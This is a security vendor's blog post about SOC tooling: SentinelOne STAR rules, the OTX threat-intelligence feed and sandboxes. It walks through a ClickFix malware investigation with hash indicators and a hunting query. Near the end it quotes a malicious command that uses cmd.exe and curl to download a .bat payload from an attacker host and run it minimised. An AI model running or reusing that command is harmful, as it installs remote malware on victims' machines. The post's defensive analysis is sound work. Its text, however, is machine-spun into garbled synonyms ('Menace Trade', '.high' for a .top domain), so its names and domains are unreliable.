Saturday, August 9, 2025

A SOC Toolbelt: Finest Practices for Safety

A SOC Toolbelt

To maintain tempo with quickly evolving threats and the reducing breakout instances of attackers, the LevelBlue safety operations staff leverages a number of instruments and key partnerships to shorten the time between detection and response. Under are some examples of the instruments utilized by our SOC and among the circumstances during which every software can be used.

A Partnership with SentinelOne

By means of LevelBlue’s Managed Endpoint Safety with SentinelOne, our SOC has offered distinctive worth with better safety and endpoint visibility to our prospects.  The SOC was in a position to tremendously cut back the time between detection and response with STAR (Storyline Lively Response) alarms inside SentinelOne. These STAR alarms are customized constructed by our staff and are knowledgeable by proactive detections from our risk hunters round current threats and TTPs (Methods, Techniques, and Procedures).

By using risk intelligence reviews and information at hand, our staff was in a position to carry out a deeper assessment into the TTPs of current threats. This allowed for the creation of customized guidelines to extra rapidly detect IOCs (Indicators of Compromise) inside our prospects’ environments. Our LevelBlue Labs risk intelligence staff additionally utilized this info to create new guidelines in USM Anyplace, our open XDR platform.

As a trusted safety associate, LevelBlue is all the time striving to enhance our detection and response instances to extend worth and supply extra proactive help to our prospects. These instruments are important for us to enhance response instances and stop threats from affecting our prospects.

Bundling Managed Endpoint Safety and Managed Menace Detection and Response is a good possibility for patrons who lack information ingestion from endpoints in USMA and wish improved visibility.   The bundle additionally advantages prospects trying to steadiness the price of third-party safety companions with the prices of extra monitoring instruments. As a substitute of shopping for a number of instruments to deliver doubtlessly noisy information into USMA, bundling gives complete visibility throughout your endpoints together with the 24/7 monitoring that’s a part of our Managed Menace Detection and Response supply.

Open Menace Trade (OTX)

The LevelBlue Labs Open Menace Trade (OTX) is one other integral software our analysts depend upon throughout alarm triage and investigation. This platform is without doubt one of the largest risk intelligence communities with over 330K+ members worldwide.

LevelBlue Labs repeatedly updates OTX, and risk intelligence from OTX integrates seamlessly into LevelBlue’s USMA platform. Our prospects’ environments are scanned for OTX pulse matches and IOCs. If an indicator from a pulse the shopper is subscribed to is found of their setting, an alarm is generated.

Upon analyzing an alarm in USMA, analysts are directed to the related pulse. The analyst can use the extra IOCs related to that pulse to additional their investigation. 

Centralizing this info in USMA helps our analysts streamline incident triage and these pulses will be in contrast with different Open-Supply Intelligence (OSINT) to offer analysts extra context of their investigation. Analysts may use the OTX Pulse ID straight inside USMA to question the shoppers’ setting for any extra IOCs related to the risk being investigated.

Figure 1 - A SOC Toolbelt: Best Practices for Security Operations

Determine 1: Occasion search of buyer occasion utilizing OTX ID

STAR Guidelines

The LevelBlue SOC has additionally created a customized alerting system based mostly on high-fidelity detection strategies that has elevated response instances by bringing these alerts to the forefront of our analysts’ consideration. These high-fidelity strategies, whether or not associated to customized STAR guidelines or consumer compromise detections, are simply one other instance of the proactive work our SOC staff does to enhance worth for our prospects.

SentinelOne’s STAR guidelines have confirmed to be a useful addition to the detection toolset already utilized by the MDR SOC. When a risk is detected and an alarm has been raised, a SOC analyst will use completely different instruments for analyzing the risk and its associated artifacts. 

The LevelBlue SOC Investigates: ClickFix

ClickFix is a social engineering marketing campaign that exploits the looks of legitimacy to trick victims into executing malicious scripts. Within the following investigation, the SOC used a number of instruments together with Joe’s Sandbox, SentinelOne Deep Visibility, and SentinelOne Blocklist to investigate a ClickFix assault. The investigation started when the SOC obtained an alarm for a command line that’s indicative of ClickFix malware (see determine 2).

Figure 2 - A SOC Toolbelt: Best Practices for Security Operations

Determine 2: ClickFix alarm in USMA

The command line proven above allowed our staff to acquire the file and knowledge from that file. With this, our staff may search throughout our buyer base to find out if the file existed in every other environments and add the file hashes to our international SentinelOne blocklist.

To assessment this command line, the SOC would sometimes make the most of a web based Sandbox service corresponding to Joe’s Sandbox or AnyRun. Joe’s Sandbox is preferable within the occasion there’s buyer information current, as a result of it’s run in a non-public tenant. AnyRun can also be a strong software, however their free service just isn’t personal and used solely whether it is confirmed that no buyer information is contained.

After working the command line above in Joe’s Sandbox, we obtained an in-depth exercise report (see determine 3 under).

 

Figure 3 - A SOC Toolbelt: Best Practices for Security Operations

Determine 3: Preliminary command line executed in ClickFix assault

After working the command in Joe’s Sandbox, nothing popped up on the entrance finish, however we did get a listing of suspicious information dropped within the report that was generated (see determine 4 under).

Figure 4 - A SOC Toolbelt: Best Practices for Security Operations

Determine 4: Record of suspicious information from Joe’s Sandbox report

From the file we had been in a position to retrieve the SHA1 hashes, and seek for potential compromise throughout our bundled prospects’ environments. Utilizing SentinelOne Deep Visibility, our SOC staff wrote a easy question looking out the File Hash fields for any of the hashes obtained in our report:

#hash incorporates ( “A48C95DF3D802FFB6E5ECADA542CC5E028192F2B” , “7EC84BE84FE23F0B0093B647538737E1F19EBB03” , “C2E5EA8AFCD46694448D812D1FFCD02D1F594022” , “3D199BEE412CBAC0A6D2C4C9FD5509AD12A667E7” , “98DD757E1C1FA8B5605BDA892AA0B82EBEFA1F07” , “01873977C871D3346D795CF7E3888685DE9F0B16” , “C4E27A43075CE993FF6BB033360AF386B2FC58FF” , “906F7E94F841D464D4DA144F7C858FA2160E36DB” , “A556209655DCB5E939FD404F57D199F2BB6DA9B3” , “AD464EB7CF5C19C8A443AB5B590440B32DBC618F” )

Working this question confirmed us 5 detections from an incident that occurred every week prior in a unique buyer’s setting (see determine 5 under).

Figure 5 - A SOC Toolbelt: Best Practices for Security Operations

Determine 5: Detections from question trying to find hashes obtained in report

Our staff additionally used SentinelOne’s Blocklist function so as to add these hashes to blocklist at a world scope degree to make sure the file is killed and quarantined if detected in a buyer setting (see determine 6).

 

Figure 7 - A SOC Toolbelt: Best Practices for Security Operations

Determine 6: Including SHA1 hash of NetSupport RAT to SentinelOne international blocklist

When conducting a static evaluation of a web site or potential phishing hyperlink, our analysts will sometimes use a service that visits the positioning and gives a screenshot of the web page, together with info together with the web page supply code, redirects, scripts, and any photos.  Within the following state of affairs, our staff obtained an alarm for a DNS request to a suspicious area that’s included in our OTX Pulses (determine 7).

 

Figure 7 - A SOC Toolbelt: Best Practices for Security Operations

Determine 7: OTX alarm in USMA for compromised web site liable for ClickFix assault

Upon preliminary assessment, the area appeared to belong to a traditional journey web site.  Our staff then inspected the community visitors from the web site scan within the HTTP tab under and appeared for any redirects that occurred throughout the scan within the Redirects tab (see determine 8).

 

Figure 8 - A SOC Toolbelt: Best Practices for Security Operations

Determine 8: URL Scan of the compromised web site islonline[.]org

Beneath the HTTP tab, our staff noticed {that a} file titled j.js hosted on the positioning navigated to the positioning hxxps[://]lang3666[.]high/lv/xfa[.].

Figure 9 - A SOC Toolbelt: Best Practices for Security Operations

Determine 9: Redirect to suspicious js file and .high area

By working a URL scan, our analysts had been in a position to retrieve the supply code of the js file:

Figure 10 - A SOC Toolbelt: Best Practices for Security Operations

Determine 10: Supply code of js file hosted on .high area

Additional assessment of the file revealed an obfuscated script that’s used to find out if the consumer agent is a cell phone or desktop. The script then generates an 8- digit identifier which is then appended to the URL hxxps[://]lang3666[.]high/lv/index[.]php?. This leads to downloading one other script to get the ultimate payload. ClickFix assaults typically observe this chain of occasions, and lead to a command just like the one pictured under:

Cmd.exe /c curl.exe -k -Ss -X POST https://pravaix[.]high/lv/lll[.]php -o “C:UsersPublicjkdfgf.bat” && begin /min “” C:UsersPublic jkdfgf.bat

Conclusion

As seen within the ClickFix investigation above, USM Anyplace’s integrations allow the LevelBlue SOC to tremendously cut back the time between detection and response.

You possibly can learn extra about ClickFix and the LevelBlue SOC’s suggestions to guard your environments within the LevelBlue Menace Traits Report, Idiot Me As soon as: How Cybercriminals Are Mastering the Artwork of Deception.

The content material offered herein is for normal informational functions solely and shouldn’t be construed as authorized, regulatory, compliance, or cybersecurity recommendation. Organizations ought to seek the advice of their very own authorized, compliance, or cybersecurity professionals concerning particular obligations and danger administration methods. Whereas LevelBlue’s Managed Menace Detection and Response options are designed to help risk detection and response on the endpoint degree, they don’t seem to be an alternative to complete community monitoring, vulnerability administration, or a full cybersecurity program.

Related Articles

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Latest Articles